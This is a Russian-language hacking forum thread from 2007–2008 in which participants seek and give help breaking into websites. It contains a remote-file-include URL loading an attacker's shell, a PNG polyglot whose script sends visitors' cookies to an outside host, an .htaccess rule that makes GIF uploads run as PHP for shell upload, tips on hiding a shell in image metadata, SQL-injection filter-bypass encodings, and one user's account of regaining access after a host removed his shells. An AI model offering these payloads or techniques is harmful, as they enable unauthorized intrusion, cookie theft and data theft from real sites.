Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. 4y4o

    4y4o Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    40
    Likes Received:
    2
    Reputations:
    0
    n0ne там стоит винда и пусть к смд я подобрал. вопрос как эксплуатировать смд через вэб интерфейс. Windows/System32/cmd.exe?/c+dir+c:\ не работает. Я спросил есть ли ещё варианты читай внимательней.
     
  2. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Чтение еще не значит исполнение. Возможно, там только инклуд. Попробуй заюзать что-то типа
    http://site.ru/?page=http://h4x0r.net/shell.php
     
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Какая версия бд?
     
  4. 4y4o

    4y4o Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    40
    Likes Received:
    2
    Reputations:
    0
    Что за тип хэша *02A4DF6067015EA7070ACE86D62DE48C0BCADA75?
    Слил с mysql 4.1.22.
     
  5. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
  6. prozorov

    prozorov Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    проблемы с доступом к серверу

    в общем, описываю ситуацию с самого начала.

    был доступ к серву посредсвам шела, потом поимел доступ к бд итд
    когда холдер заметил мое появление удалил все шелы.
    залил заново, но теперь шел не запускается (пробовал разные).
    видимо чтото с обработкой пхп. При запросе к пхп файлам вылазит пустая страница(в сорсах- хтмл=боди-боди-хтмл)
    остался доступ к админке- заливаю без проблем, но редактить нельзя.
    с БД тоже самое- просто вылазит пустая страница (с других ипов не пускает, сам прописывал свой ип в конфигах)
    к записи в админке разрешены следующие форматы
    txt, php, gif, jpg, xls, mdb, csv, rar, zip, css, doc, chm, pdf

    Что сейчас можно сделать чтобы снова доступ получить? И что вообще холдер сделал?
     
    #1226 prozorov, 17 Mar 2008
    Last edited: 17 Mar 2008
  7. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    prozorov, Залей какой-нить скрипт для работы с бд на пхп и проверь работает ли, и просто <? echo 'henk'; ?>, и напиши результаты.
     
    1 person likes this.
  8. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    к примеру мог в папку куда все льется положить хтакцес с php_flag engine off
     
  9. prozorov

    prozorov Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0

    подходящих скриптов не нашел, но вроде обрабатывает
    <? echo 'henk'; ?> тоже обрабатывает

    хтакцес с php_flag engine off

    может быть, я проверил все папки- результат один

    кста, на сайте форум был, тоже работать перестал
     
  10. MSDEN

    MSDEN New Member

    Joined:
    7 May 2007
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    нашел xss на сайте залив картинку png c таким содержанием

    Code:
    ‰PNG         IHDR         Д‰   sRGB ®Ой   gAMA  ±Џьa    cHRM  z&  Ђ„  ъ   Ђи  u0  к`  :˜  pњєQ<   	pHYs     љњ   IDATWcш 	ыэ+ХE    IEND®B`‚<html>  <script>alert(/by_blabla_/)</script><script>img = new Image();  img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script>  </html> z&  Ђ„  ъ   Ђи  u0  к`  :˜  pњєQ<   	pHYs     љњ   IDATWcш 	ыэ+ХE    IEND®B`‚
    напрашивается вопрос можно ли вставить шелл вместо <html> <script>alert(/by_blabal_/)</script><script>img = new Image(); img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script> </html> ?

    я вставляю вместо этого код шелла а когда запускаю такое чувство будто php не работает =(
     
  11. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    нет, xss выполняется на стороне клиента. пхп код который ты вставляешь тоже только показывается юзеру, но не выполняется на самом сервере
     
  12. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    prozorov у тя safe mode on скорее всего с safe_mode_gid(on)

    to MSDEN

    по пробуй залить это
    PHP:
    <Files "s.gif">
    AddType application/x-httpd-php .gif
    </Files>

    и залить картинку с шеллом.
     
  13. MSDEN

    MSDEN New Member

    Joined:
    7 May 2007
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    gibson, я в этом чуть чуть чайнег
    <Files "s.gif">
    AddType application/x-httpd-php .gif
    </Files> залить в виде чего? как второй файл чтоли?
    а какртинку с шеллом как залить? просто у шелла разрешение поменять?
    если нетрудно дай аську ;)
     
  14. none222

    none222 Guest

    Reputations:
    0
    это текст в файле .htaccess (тип настройка в апаче). Этот файл говорит апачу, чтобы расшширение ГИФ он воспринимал как скрипт.

    Как залить? ЕСли у тя там проверка тока по расширению, то поменяй просто расширение. а если по типу, то допиши шелл в конец картинки. (ну например в свойствах в поле exif впиши)
     
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    prozorov, в каком плане обрабатываеца? Работает или нет? я про echo.
     
  16. prozorov

    prozorov Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    работает, на страницу вывелось henk
     
  17. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    prozorov, _ttp://webfile.ru/1810388

    Попорбуй этот скрипт запустить
     
    1 person likes this.
  18. prozorov

    prozorov Elder - Старейшина

    Joined:
    19 Jan 2007
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    спс,
    скрипт работает, но конеекта нет
     
  19. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    нашел инъекцию, знаю таблицы,поля и т.п., на
    1,version(),3/* отвечает положительно, но если добавить from то сразу вылетает ошибка что скрипт небезопасный,т.е. фильтруют. как решить?hex ?
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 bad
    FroM
    %66%72%6f%6d
    %25%36%36%25%37%32%25%36%46%25%36%44
    f/**/r/**/o/**/m
    Варианты from ,но может и не проскочить
     
Thread Status:
Not open for further replies.